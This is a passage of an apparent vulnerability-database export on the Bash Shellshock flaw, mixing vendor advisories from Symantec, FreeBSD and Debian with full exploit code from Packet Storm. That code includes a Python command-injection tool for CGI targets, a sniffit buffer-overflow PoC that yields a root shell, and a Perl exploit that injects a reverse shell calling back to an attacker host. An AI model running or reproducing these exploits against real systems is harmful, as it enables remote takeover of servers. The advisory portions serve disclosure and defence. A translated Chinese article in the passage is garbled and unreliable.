11.4 \n * Symantec NetBackup Appliances 5000 1.4.4 \n * Symantec NetBackup Appliances 5030 1.4.4 \n * Symantec NetBackup Appliances 5200 1.1 \n * Symantec NetBackup Appliances 5200 2.0 \n * Symantec NetBackup Appliances 5220 2.0 \n * Symantec NetBackup Appliances 5230 2.5.2 \n * Symantec NetBackup Appliances 5230 2.5.3 \n * Symantec NetBackup Appliances 5230 2.5.4 \n * Symantec NetBackup Appliances 5230 2.6 \n * Symantec NetBackup Enterprise Server 7.0 \n * Symantec NetBackup Server 7.0 \n * Trendmicro Advanced Reporting Module (ARM) 1.5 \n * Trendmicro Advanced Reporting Module (ARM) 1.6 \n * Trendmicro Data Loss Prevention Network Monitor (DLPNM) 2.0 \n * Trendmicro Interscan Messaging Security Virtual Appliance (IMSVA) 8.0 \n * Trendmicro Interscan Messaging Security Virtual Appliance (IMSVA) 8.2 \n * Trendmicro Interscan Messaging Security Virtual Appliance (IMSVA) 8.5 \n * Trendmicro Interscan Web Security Virtual Appliance (IWSVA) 5.5 \n * Trendmicro Interscan Web Security Virtual Appliance (IWSVA) 5.6 \n * Trendmicro Interscan Web Security Virtual Appliance (IWSVA) 6.0 SP1 \n * Trendmicro Interscan Web Security Virtual Appliance (IWSVA) 6.5 \n * Ubuntu Ubuntu Linux 10.04 ARM \n * Ubuntu Ubuntu Linux 10.04 Amd64 \n * Ubuntu Ubuntu Linux 10.04 I386 \n * Ubuntu Ubuntu Linux 10.04 Powerpc \n * Ubuntu Ubuntu Linux 10.04 Sparc \n * Ubuntu Ubuntu Linux 12.04 LTS amd64 \n * Ubuntu Ubuntu Linux 12.04 LTS i386 \n * Ubuntu Ubuntu Linux 14.04 LTS \n * VMWare Application Dependency Planner \n * VMWare ESX 4.0 \n * VMWare ESX 4.1 \n * VMWare ESXi \n * VMWare HealthAnalyzer 5.0 \n * VMWare Horizon DaaS Platform 5.0 \n * VMWare Horizon Workspace 1.5 \n * VMWare Horizon Workspace 1.8 \n * VMWare Horizon Workspace 1.8.1 \n * VMWare Horizon Workspace 2.0 \n * VMWare IT Business Management Suite 1.0 \n * VMWare Mirage Gateway 5.0 \n * VMWare NSX for Multi-Hypervisor 4.0.3 \n * VMWare NSX for Multi-Hypervisor 4.1.2 \n * VMWare NSX for vSphere 6.0.4 \n * VMWare NVP 3.0 \n * VMWare NVP 3.2.2 \n * VMWare Socialcast On Premise \n * VMWare Studio 2.0 \n * VMWare Studio 2.0 BETA \n * VMWare Studio 2.1 \n * VMWare TAM Data Manager \n * VMWare VMware Data Recovery 2.0.3 \n * VMWare Vcenter Converter Standalone 5.1 \n * VMWare Vcenter Converter Standalone 5.5 \n * VMWare Viewplanner 3.0 \n * VMWare Workbench 3.0 \n * VMWare vCenter Application Discovery Manager \n * VMWare vCenter Hyperic Server 5.0 \n * VMWare vCenter Infrastructure Navigator 5.0 \n * VMWare vCenter Infrastructure Navigator 5.8 \n * VMWare vCenter Log Insight 1.0 \n * VMWare vCenter Log Insight 2.0 \n * VMWare vCenter Operations Manager 5.8.1 \n * VMWare vCenter Orchestrator Appliance 4.0 \n * VMWare vCenter Orchestrator Appliance 5.0 \n * VMWare vCenter Server Appliance 5.0 \n * VMWare vCenter Server Appliance 5.0 Update 1 \n * VMWare vCenter Server Appliance 5.0 Update 2 \n * VMWare vCenter Server Appliance 5.1 \n * VMWare vCenter Server Appliance 5.1 Patch 1 \n * VMWare vCenter Server Appliance 5.1 Update 1 \n * VMWare vCenter Server Appliance 5.1.0 Update b \n * VMWare vCenter Server Appliance 5.5 \n * VMWare vCenter Server Appliance 5.5 Update 1 \n * VMWare vCenter Site Recovery Manager 5.1.1 \n * VMWare vCenter Site Recovery Manager 5.5.1 \n * VMWare vCenter Support Assistant 5.5.0 \n * VMWare vCenter Support Assistant 5.5.1 \n * VMWare vCloud Automation Center (vCAC) 6.0 \n * VMWare vCloud Automation Center Application Services 6.0 \n * VMWare vCloud Connector 2.0 \n * VMWare vCloud Director Appliance 5.0 \n * VMWare vCloud Networking and Security 5.1 \n * VMWare vCloud Networking and Security 5.1.2 \n * VMWare vCloud Networking and Security 5.1.3 \n * VMWare vCloud Networking and Security 5.1.4.2 \n * VMWare vCloud Networking and Security 5.5 \n * VMWare vCloud Networking and Security 5.5.1 \n * VMWare vCloud Networking and Security 5.5.2 \n * VMWare vCloud Networking and Security 5.5.3 \n * VMWare vCloud Usage Meter 3.0 \n * VMWare vFabric Application Director 5.0.0 \n * VMWare vFabric Application Director 5.2.0 \n * VMWare vFabric Application Director 6.0 \n * VMWare vFabric Postgres 9.1.6 \n * VMWare vFabric Postgres 9.1.9 \n * VMWare vFabric Postgres 9.2.2 \n * VMWare vFabric Postgres 9.2.4 \n * VMWare vSphere App HA 1.0 \n * VMWare vSphere Big Data Extensions 1.0 \n * VMWare vSphere Big Data Extensions 2.0 \n * VMWare vSphere Data Protection 5.0 \n * VMWare vSphere Management Assistant 5.0 \n * VMWare vSphere Replication 5.5.1 \n * VMWare vSphere Replication 5.6 \n * VMWare vSphere Storage Appliance 5.1.3 \n * VMWare vSphere Storage Appliance 5.5.1 \n * Xerox ColorQube 8700 \n * Xerox ColorQube 8900 \n * Xerox ColorQube 9301 \n * Xerox ColorQube 9302 \n * Xerox ColorQube 9303 \n * Xerox ColorQube 9393 \n * Xerox Phaser 6700 \n * Xerox Phaser 7800 \n * Xerox WorkCentre 3655 \n * Xerox WorkCentre 5735 \n * Xerox WorkCentre 5740 \n * Xerox WorkCentre 5745 \n * Xerox WorkCentre 5755 \n * Xerox WorkCentre 5945 \n * Xerox WorkCentre 5955 \n * Xerox WorkCentre 6655 \n * Xerox WorkCentre 7220 \n * Xerox WorkCentre 7225 \n * Xerox WorkCentre 7228 \n * Xerox WorkCentre 7232 \n * Xerox WorkCentre 7235 \n * Xerox WorkCentre 7238 \n * Xerox WorkCentre 7242 \n * Xerox WorkCentre 7245 \n * Xerox WorkCentre 7525 \n * Xerox WorkCentre 7530 \n * Xerox WorkCentre 7535 \n * Xerox WorkCentre 7545 \n * Xerox WorkCentre 7556 \n * Xerox WorkCentre 7755 \n * Xerox WorkCentre 7765 \n * Xerox WorkCentre 7775 \n * Xerox WorkCentre 7830 \n * Xerox WorkCentre 7835 \n * Xerox WorkCentre 7845 \n * Xerox WorkCentre 7855 \n * Xerox WorkCentre 7970 \n\n### Recommendations\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic \n\n**Implement multiple redundant layers of security.** \nVarious memory-protection schemes (such as nonexecutable and randomly mapped memory segments) may hinder an attacker's ability to exploit this vulnerability to execute arbitrary code.\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo limit the impact of latent vulnerabilities, configure database servers and other applications to run as a nonadministrative user with minimal access rights.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2014-09-24T00:00:00", "published": "2014-09-24T00:00:00", "id": "SMNTC-70103", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/70103", "type": "symantec", "title": "GNU Bash CVE-2014-6271 Remote Code Execution Vulnerability", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "freebsd": [{"lastseen": "2019-05-29T18:33:24", "bulletinFamily": "unix", "description": "\nChet Ramey reports:\n\nUnder certain circumstances, bash will execute user code\n\t while processing the environment for exported function\n\t definitions.\n\nThe original fix released for CVE-2014-6271 was not adequate. A\n\t similar vulnerability was discovered and tagged as CVE-2014-7169.\n", "modified": "2014-09-25T00:00:00", "published": "2014-09-24T00:00:00", "id": "71AD81DA-4414-11E4-A33E-3C970E169BC2", "href": "https://vuxml.freebsd.org/freebsd/71ad81da-4414-11e4-a33e-3c970e169bc2.html", "title": "bash -- remote code execution vulnerability", "type": "freebsd", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "myhack58": [{"lastseen": "2016-11-15T17:55:20", "bulletinFamily": "info", "description": "! [bashbug](/Article/UploadPic/2014-9/201492821235412.jpg)a lot of people perhaps the upper half of the occurrence of the security issues of the\u201cheart bleed\u201din Heartbleed Bug event memory is quite deep, this two days, there was also a\u201cdestruction level\u201dof vulnerability-the Bash software security vulnerabilities. This vulnerability French GNU/Linux enthusiasts St\u00e9phane Hassles found it. Subsequently, the United States computer Emergency Response Center, US-CERT, the Red Hat and more engaged in the security of the company to the Wednesday Time 9 month 2 4 day warning. On the security vulnerabilities details can be found in the United States government computing security of both vulnerability disclosure: [CVE-2 0 1 4-6 2 7 1](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271>) and [CVE-2 0 1 4-7 1 6 9](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7169> a).\n\nThis vulnerability is actually very classic\u201cinjection attacks\u201d, which is able to bash into a segment command from bash1. 1 4 to 4. 3 The existence of such a vulnerability. We first look at the security issues of the symptoms.\n\n#### Shellshock (CVE-2 0 1 4-6 2 7 1)\n\nThe following is a simple test:\n\n\n$ env VAR='() { :;}; echo Bash is vulnerable!' bash-c \"echo Bash Test\"\n\nIf you find the above commands in your bash has such an output, that you it shows your bash is vulnerable:\n\n\nBash is vulnerable!\nBash Test\n\nSimply look at, in fact, is to the environment variables into a segment code **echo Bash is vulnerable** to. On one of the principles I will be given later.\n\nSoon, the CVE-2 0 1 4-6 2 7 1 The official patch out.-- [Bash-4.3 Official Patch 2 of 5](<https://lists.gnu.org/archive/html/bug-bash/2014-09/msg00081.html>)\n\n**[1] [[2]](<54156_2.htm>) [[3]](<54156_3.htm>) [[4]](<54156_4.htm>) [[5]](<54156_5.htm>) [[6]](<54156_6.htm>) [[7]](<54156_7.htm>) [[8]](<54156_8.htm>) [next](<54156_2.htm>)**\n", "modified": "2014-09-28T00:00:00", "published": "2014-09-28T00:00:00", "href": "http://www.myhack58.com/Article/html/3/62/2014/54156.htm", "id": "MYHACK58:62201454156", "type": "myhack58", "title": "bash code injection security vulnerability-vulnerability warning-the black bar safety net", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:18:53", "bulletinFamily": "exploit", "description": "", "modified": "2014-09-26T00:00:00", "published": "2014-09-26T00:00:00", "href": "https://packetstormsecurity.com/files/128442/Gnu-Bash-4.3-CGI-Scan-Remote-Command-Injection.html", "id": "PACKETSTORM:128442", "type": "packetstorm", "title": "Gnu Bash 4.3 CGI Scan Remote Command Injection", "sourceData": "`#!/usr/bin/env python \n \n# http connection \nimport urllib2 \n# Args management \nimport optparse \n# Error managemen \nimport sys \n \nbanner = \"\"\" \n_______ _______ __ \n| _ .-----.--.--. | _ .---.-.-----| |--. \n|. |___| | | | |. 1 | _ |__ --| | \n|. | |__|__|_____| |. _ |___._|_____|__|__| \n|: 1 | |: 1 \\ \n|::.. . | |::.. . / \n`-------' `-------' \n___ ___ _______ _______ _______ ___ \n| Y | | _ | | _ | _ | | \n| | |_|___| | |. l |. 1___|. | \n|____ |___(__ | |. _ |. |___|. | \n|: | |: 1 | |: | |: 1 |: | \n|::.| |::.. . | |::.|:. |::.. . |::.| \n`---' `-------' `--- ---`-------`---' \n \nGnu B4sh <= 4.3 Cg1 Sc4n + r3m0t3 C0mm4nd Inj3ct10n \n \n========================================== \n- Release date: 2014-09-25 \n- Discovered by: Stephane Chazelas \n- CVE: 2014-6271 \n=========================================== \n \nWritten by: \n \nClaudio Viviani \n \nhttp://www.homelab.it \n \ninfo@homelab.it \nhomelabit@protonmail.ch \n \nhttps://www.facebook.com/homelabit \nhttps://twitter.com/homelabit \nhttps://plus.google.com/+HomelabIt1/ \nhttps://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww \n\"\"\" \n \n# Check url \ndef checkurl(url): \nif url[:8] != \"https://\" and url[:7] != \"http://\": \nprint('[X] You must insert http:// or https:// procotol') \nsys.exit(1) \nelse: \nreturn url \n \ndef connectionScan(url): \nprint '[+] Checking for vulnerability...' \ntry: \nheaders = {\"VULN\" : \"() { :;}; echo 'H0m3l4b1t: YES'\"} \nresponse = urllib2.Request(url, None, headers) \ncontent = urllib2.urlopen(response) \nif 'H0m3l4b1t' in content.info(): \nprint '[!] VULNERABLE: '+url \nelse: \nprint '[X] NOT Vulnerable' \nexcept urllib2.HTTPError, e: \nprint e.info() \nif e.code == 400: \nprint '[X] Page not found' \nelse: \nprint '[X] HTTP Error' \nexcept urllib2.URLError: \nprint '[X] Connection Error' \n \ndef connectionInje(url,cmd): \ntry: \nheaders = { 'User-Agent' : '() { :;}; /bin/bash -c \"'+cmd+'\"' } \nresponse = urllib2.Request(url, None, headers) \ncontent = urllib2.urlopen(response).read() \nprint '[!] '+cmd+' command sent!' \nexcept urllib2.HTTPError, e: \nif e.code == 500: \nprint '[!] '+cmd+' command sent!!!' \nelse: \nprint '[!] command not sent :(' \nexcept urllib2.URLError: \nprint '[X] Connection Error' \n \ncommandList = optparse.OptionParser('usage: %prog [-s] -t http://localhost/cgi-bin/test -c \"touch /tmp/test.txt\"') \ncommandList.add_option('-t', '--target', action=\"store\", \nhelp=\"Insert TARGET URL: http[s]://www.victim.com[:PORT]\", \n) \ncommandList.add_option('-c', '--cmd', action=\"store\", \nhelp=\"Insert command name\", \n) \ncommandList.add_option('-s', '--scan', default=False, action=\"store_true\", \nhelp=\"Scan Only\", \n) \noptions, remainder = commandList.parse_args() \n \n# Check args \nif not options.target: \nprint(banner) \ncommandList.print_help() \nsys.exit(1) \nelif options.target and not options.cmd and not options.scan: \nprint(banner) \ncommandList.print_help() \nsys.exit(1) \n \nprint(banner) \n \nurl = checkurl(options.target) \ncmd = options.cmd \nif options.scan: \nprint '[+] Scan Only Mode' \nconnectionScan(url) \nelse: \nprint '[+] Remote Command Innection Mode' \nconnectionScan(url) \nconnectionInje(url,cmd) \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/128442/gnu_b4sh_43_rci_v2.py.txt", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-05T22:14:02", "bulletinFamily": "exploit", "description": "", "modified": "2014-11-27T00:00:00", "published": "2014-11-27T00:00:00", "href": "https://packetstormsecurity.com/files/129292/Sniffit-Root-Shell.html", "id": "PACKETSTORM:129292", "type": "packetstorm", "title": "Sniffit Root Shell", "sourceData": "`CVE-2014-5439 - Root shell on Sniffit \nAuthors: Ismael Ripoll & Hector Marco \nCVE: CVE-2014-5439 \nDates: July 2014 - Discovered the vulnerability \n \nDescription \n \nSniffit is a packet sniffer and monitoring tool. A bug in sniffit prior to 0.3.7 has been found. The bug is caused by an incorrect implementation of the functions clean_filename() and clean_string() which causes a stack buffer overflow when parsing a configuration file with \"long\" paths (more than 20 characters). \n \nThe attacker can to create a specially-crafted sniffit configuration file, which is able to bypass all three protection mechanisms: \n \nNon-eXecutable bit NX \nStack Smashing Protector SSP \nAddress Space Layout Randomisation ASLR \n \nAnd execute arbitrary code with root privileges (the id of the user that launches the sniffit). \n \nThe new issue has been assigned CVE-2014-7169. \n \nThe presented PoC successfully exploits the vulnerability. \n \n \nImpact \n \nTo use the sniffit, the application need to be executed with root privileges. Typically by sudo or pkexec or setting the UID bit. Since this tool requires this privilege to execute the sniffer, only allowing to a user execute the sniffer is enough to execute commands as root. \n \n \n \nVulnerable packages \n \nThe sniffit 0.3.7 and prior are affected. Currently, this tool is in the universe repository installable via apt-get install sniffit. For example, the sniffit is available on Ubuntu 14.04.1 LTS and prior. \n \n \n \nVulnerability \n \nThe vulnerability is caused due to incorrect implementation of the functions clean_filename() and clean_string(). These functions suffer from a stack buffer overflow. \n \nThe bug appears in file sn_cfgfile.c on the following functions: \n \nchar *clean_string (char *string) { \nchar help[20]; \nint i, j; \nj=0; \nfor (i=0;i<strlen(string);i++) { \nif( (isalnum(string[i]))||(string[i]=='.') ) { \nhelp[j]=string[i]; \nhelp[j+1]=0; \n} \nj++; \n} \nstrcpy(string, help); \nreturn string; \n} \n \nchar *clean_filename (char *string) { \nchar help[20]; \nint i, j; \nj=0; \nfor (i=0;i<strlen(string);i++) { \nif( !(iscntrl(string[i])) && !(isspace(string[i])) ) { \nhelp[j]=string[i]; \nhelp[j+1]=0; \n} \nj++; \n} \nstrcpy(string, help); \nreturn string; \n} \n \n \n \n \nExploit (PoC) \n \nI have built an exploit to bypass the three most popular protections techniques: Non-eXecutable bit NX, Stack Smashing Protector SSP and Address Space Layout Randomisation ASLR. The exploit finally obtains a root shell. The exploit was successfully tested with Ubuntu 14.04.1 LTS (trusty) with kernel 3.13.0-32-generic (x86_64) fully updated. \n \nThe sniffit exploit is a shell script which will creates a specially-crafted configuration file \"exploit-sniffit-0.3.7-shell.cfg\". Passing this configuration file to sniffit through the \"-c\" option we will obtain a root shell. \n \n---- start exploit-sniffit-0.3.7-shell.sh exploit ---- \n \ncfgfile=' \nbG9nZmlsZSAvL2Jpbi9zaApsb2dmaWxlIIiIiIiIiIiImZmZmZmZmZmqqqqqqqqqqgYGBgYGBgYG \nQUFBQUFBQUEHBwcHBwcHB0NDQ0NDQ0NDRERERERERERFRUVFRUVFRUZGRkZGRkZGR0dHR0dHR0dJ \nP0AGBgYGBiH8YAYGBgYGKzxABgYGBgYh/GAGBgYGBtWbQAYGBgYGCkV4cGxvaXQgYnkgSGVjdG9y \nIE1hcmNvIDxobWFyY29AaG1hcmNvLm9yZz4KaHR0cDovL2htYXJjby5vcmcK' \n \necho \"\" \necho \"-----------------------=======-------------------------\" \necho \"----------------=======================----------------\" \necho \"\" \necho \" Author: Hector Marco-Gisbert <hmarco@hmarco.org>\" \necho \" Website: http://hmarco.org\" \necho \" Comment: Exploit for sniffit <= 0.3.7 (root shell)\" \necho \"\" \necho \"----------------=======================----------------\" \necho \"-----------------------=======-------------------------\" \necho \"\" \n \necho \"[+] Creating crafted configuration file for sniffit ...\" \necho \"${cfgfile}\" | base64 -d > exploit-sniffit-0.3.7-shell.cfg \necho -e \"\\n[+] File exploit-sniffit-0.3.7-shell.cfg successfully created !\" \n \necho \"\" \necho \"[+] Help:\" \necho \" If your sniffit is installed with the Set-User-ID then execute:\" \necho \" $ sniffit -c exploit-sniffit-0.3.7-shell.cfg\" \necho \"\" \necho \" If your are allowed to to execute the sniffit with sudo then execute:\" \necho \" $ sudo sniffit -c exploit-sniffit-0.3.7-shell.cfg\" \necho \"\" \n \n---- end exploit-sniffit-0.3.7-shell.sh exploit ---- \n \n \nObtaining a root shell: \n \nbox@upv.es:~$ id \nuid=1000(box) gid=1000(box) groups=1000(box) \nbox@upv.es:~$ sniffit -c exploit-sniffit-shell.cfg \n# \n# id \nuid=1000(box) gid=1000(box) euid=0(root) groups=1000(box) \n \n \nFIX \n \nThe following is a simple patch which fixes the bug. Patch for sniffit 0.3.7: \n \ndiff -Nurp sniffit-0.3.7.beta/sn_cfgfile.c sniffit-0.3.7.beta-mod/sn_cfgfile.c \n--- sniffit-0.3.7.beta/sn_cfgfile.c 2014-10-22 19:29:03.000000000 +0200 \n+++ sniffit-0.3.7.beta-mod/sn_cfgfile.c 2014-10-22 19:29:12.244971893 +0200 \n@@ -119,6 +119,11 @@ char *clean_string (char *string) \nchar help[20]; \nint i, j; \n \n+if(strlen(string) >= 20){ \n+ fprintf(stderr, \"Error: String too long [%s]\\n\", string); \n+ exit(-1); \n+} \n+ \nj=0; \nfor(i=0;i<strlen(string);i++) \n{ \n@@ -138,6 +143,11 @@ char *clean_filename (char *string) \nchar help[20]; \nint i, j; \n \n+if(strlen(string) >= 20){ \n+ fprintf(stderr, \"Error: String too long [%s]\\n\", string); \n+ exit(-1); \n+} \n+ \nj=0; \nfor(i=0;i<strlen(string);i++) \n{ \n \n[ sniffit-0.3.7-stack-buffer-overflow.patch ] \n \nPatching sniffit 0.3.7: \n \nwget http://hmarco.org/bugs/patches/sniffit-0.3.7-stack-buffer-overflow.patch \ncd sniffit-0.3.7 \npatch -p1 < ../sniffit-0.3.7-stack-buffer-overflow.patch \n \n \nDiscussion \n \nIt is hard to understand why the sniffit is still under Ubuntu universe repository, which is easily installable via apt-get install sniffit. The functions clean_string and clean_filename contain two stack buffer overflows which allow to bypass the Stack Smashing Protector (SSP) very easy and build a sequence of ROP gadgets which finally obtains a root shell. \n \nOn the other hand, it seems that the code of sniffit is no longer maintained, and may contain additional security issues. Therefore, it is very recommend to not use the sniffit at all for the sake of your security. \n \nHector Marco - http://hmarco.org \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/129292/sniffit-escalate.txt"}, {"lastseen": "2016-12-05T22:20:41", "bulletinFamily": "exploit", "description": "", "modified": "2014-09-26T00:00:00", "published": "2014-09-26T00:00:00", "href": "https://packetstormsecurity.com/files/128443/Gnu-Bash-4.3-CGI-REFERER-Command-Injection.html", "id": "PACKETSTORM:128443", "type": "packetstorm", "title": "Gnu Bash 4.3 CGI REFERER Command Injection", "sourceData": "`#!/usr/bin/perl \n# \n# Title: Bash/cgi command execution exploit \n# CVE: CVE-2014-6271 \n# Author: Simo Ben youssef \n# Contact: Simo_at_Morxploit_com \n# Coded: 25 September 2014 \n# Published: 26 September 2014 \n# MorXploit Research \n# http://www.MorXploit.com \n# \n# Description: \n# Perl code to exploit CVE-2014-6271. \n# Injects a Perl connect back shell. \n# \n# Download: \n# http://www.morxploit.com/morxploits/morxbash.pl \n# \n# Requires LWP::UserAgent \n# apt-get install libwww-perl \n# yum install libwww-perl \n# perl -MCPAN -e 'install Bundle::LWP' \n# For SSL support: \n# apt-get install liblwp-protocol-https-perl \n# yum install perl-Crypt-SSLeay \n# \n# Tested on: \n# Apache 2.4.7 / Ubuntu 14.04.1 LTS / Bash 4.3.11(1)-release (x86_64-pc-linux-gnu) \n# \n# Demo: \n# perl morxbash.pl http://localhost cgi-bin/test.cgi 127.0.0.1 1111 \n# \n# =================================================== \n# --- Bash/cgi remote command execution exploit \n# --- By: Simo Ben youssef <simo_at_morxploit_com> \n# --- MorXploit Research www.MorXploit.com \n# =================================================== \n# [*] MorXploiting http://localhost/cgi-bin/test.cgi \n# [+] Sent payload! Waiting for connect back shell ... \n# [+] Et voila you are in! \n# \n# Linux MorXploit 3.13.0-24-generic #47-Ubuntu SMP Fri May 2 23:30:00 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux \n# uid=33(www-data) gid=33(www-data) groups=33(www-data) \n# \n# Author disclaimer: \n# The information contained in this entire document is for educational, demonstration and testing purposes only. \n# Author cannot be held responsible for any malicious use or dammage. Use at your own risk. \n# \n \nuse LWP::UserAgent; \nuse IO::Socket; \nuse strict; \n \nsub banner { \nsystem(($^O eq 'MSWin32') ? 'cls' : 'clear'); \nprint \"===================================================\\n\"; \nprint \"--- Bash/cgi remote command execution exploit\\n\"; \nprint \"--- By: Simo Ben youssef <simo_at_morxploit_com>\\n\"; \nprint \"--- MorXploit Research www.MorXploit.com\\n\"; \nprint \"===================================================\\n\"; \n} \n \nif (!defined ($ARGV[0] && $ARGV[1] && $ARGV[2] && $ARGV[3])) { \nbanner(); \nprint \"perl $0 <target> <cgi script path> <connectbackIP> <connectbackport>\\n\"; \nprint \"perl $0 http://localhost cgi-bin/test.cgi 127.0.0.1 31337\\n\"; \nexit; \n} \n \nmy $host = $ARGV[0]; \nmy $dir = $ARGV[1]; \nmy $cbhost = $ARGV[2]; \nmy $cbport = $ARGV[3]; \nmy $other = \"http://localhost:81\"; \n$| = 1; \n$SIG{CHLD} = 'IGNORE'; \n \nmy $l_sock = IO::Socket::INET->new( \nProto => \"tcp\", \nLocalPort => \"$cbport\", \nListen => 1, \nLocalAddr => \"0.0.0.0\", \nReuse => 1, \n) or die \"[-] Could not listen on $cbport: $!\\n\"; \n \nsub randomagent { \nmy @array = ('Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0', \n'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0', \n'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)', \n'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36', \n'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36', \n'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31' \n); \nmy $random = $array[rand @array]; \nreturn($random); \n} \nmy $useragent = randomagent(); \n \nmy $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 }); \n$ua->timeout(10); \n$ua->agent($useragent); \nmy $status = $ua->get(\"$host/$dir\"); \nunless ($status->is_success) { \nbanner(); \nprint \"[-] Error: \" . $status->status_line . \"\\n\"; \nexit; \n} \n \nbanner(); \nprint \"[*] MorXploiting $host/$dir\\n\"; \n \nmy $payload = \"() { :; }; /bin/bash -c \\\"perl -e '\\\\\\$p=fork;exit,if(\\\\\\$p); use Socket; use FileHandle; my \\\\\\$system = \\\\\\\"/bin/sh\\\\\\\"; my \\\\\\$host = \\\\\\\"$cbhost\\\\\\\"; my \\\\\\$port = \\\\\\\"$cbport\\\\\\\";socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname(\\\\\\\"tcp\\\\\\\")); connect(SOCKET, sockaddr_in(\\\\\\$port, inet_aton(\\\\\\$host))); SOCKET->autoflush(); open(STDIN, \\\\\\\">&SOCKET\\\\\\\"); open(STDOUT,\\\\\\\">&SOCKET\\\\\\\"); open(STDERR,\\\\\\\">&SOCKET\\\\\\\"); print \\\\\\\"[+] Et voila you are in!\\\\\\\\n\\\\\\\\n\\\\\\\"; system(\\\\\\\"uname -a;id\\\\\\\"); system(\\\\\\$system);'\\\"\"; \nmy $exploit = $ua->get(\"$host/$dir\", Referer => \"$payload\"); \nprint \"[+] Sent payload! Waiting for connect back shell ...\\n\"; \nmy $a_sock = $l_sock->accept(); \n$l_sock->shutdown(SHUT_RDWR); \ncopy_data_bidi($a_sock); \n \nsub copy_data_bidi { \nmy ($socket) = @_; \nmy $child_pid = fork(); \nif (! $child_pid) { \nclose(STDIN); \ncopy_data_mono($socket, *STDOUT); \n$socket->shutdown(SHUT_RD); \nexit(); \n} else { \nclose(STDOUT); \ncopy_data_mono(*STDIN, $socket); \n$socket->shutdown(SHUT_WR); \nkill(\"TERM\", $child_pid); \n} \n} \nsub copy_data_mono { \nmy ($src, $dst) = @_; \nmy $buf; \nwhile (my $read_len = sysread($src, $buf, 4096)) { \nmy $write_len = $read_len; \nwhile ($write_len) { \nmy $written_len = syswrite($dst, $buf); \nreturn unless $written_len; \n$write_len -= $written_len; \n} \n} \n} \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/128443/morxbash.pl.txt"}], "debian": [{"lastseen": "2019-05-30T02:21:35", "bulletinFamily": "unix", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3035-1 security@debian.org\nhttp://www.debian.org/security/ Salvatore Bonaccorso\nSeptember 25, 2014 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : bash\nCVE ID : CVE-2014-7169\nDebian Bug : 762760 762761\n\nTavis Ormandy discovered that the patch applied to fix CVE-2014-6271\nreleased in DSA-3032-1 for bash, the GNU Bourne-Again Shell, was\nincomplete and could still allow some characters to be injected into\nanother environment (CVE-2014-7169). With this update prefix and suffix\nfor environment variable names which contain shell functions are added\nas hardening measure.\n\nAdditionally two out-of-bounds array accesses in the bash parser are\nfixed which were revealed in Red Hat's internal analysis for these\nissues and also independently reported by Todd Sabin.\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 4.2+dfsg-0.1+deb7u3.\n\nWe recommend that you upgrade your bash packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "modified": "2014-09-25T21:19:03", "published": "2014-09-25T21:19:03", "id": "DEBIAN:DSA-3035-1:8A617", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2014/msg00223.html", "title": "[SECURITY] [DSA 3035-1] bash security update", "type": "debian", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-22T02:23:42", "bulletinFamily": "unix", "description": "Package : bash\nVersion : 4.1-3+deb6u2\nCVE ID : CVE-2014-7169\nDebian Bug : 762760 762761\n\nTavis Ormandy discovered that the patch applied to fix CVE-2014-6271\nreleased in DSA-3032-1 for bash, the GNU Bourne-Again Shell, was\nincomplete and could still allow some characters to be injected into\nanother environment (CVE-2014-7169). With this update prefix and suffix\nfor environment variable names which contain shell functions are added\nas hardening measure.\n\nAdditionally two out-of-bounds array accesses in the bash parser are\nfixed which were revealed in Red Hat's internal analysis for these\nissues and also independently reported by Todd Sabin.\n", "modified": "2014-09-25T22:35:37", "published": "2014-09-25T22:35:37", "id": "DEBIAN:DLA-63-1:7012F", "href": "https://lists.debian.org/debian-lts-announce/2014/debian-lts-announce-201409/msg00020.html", "title": "[SECURITY] [DLA 63-1] 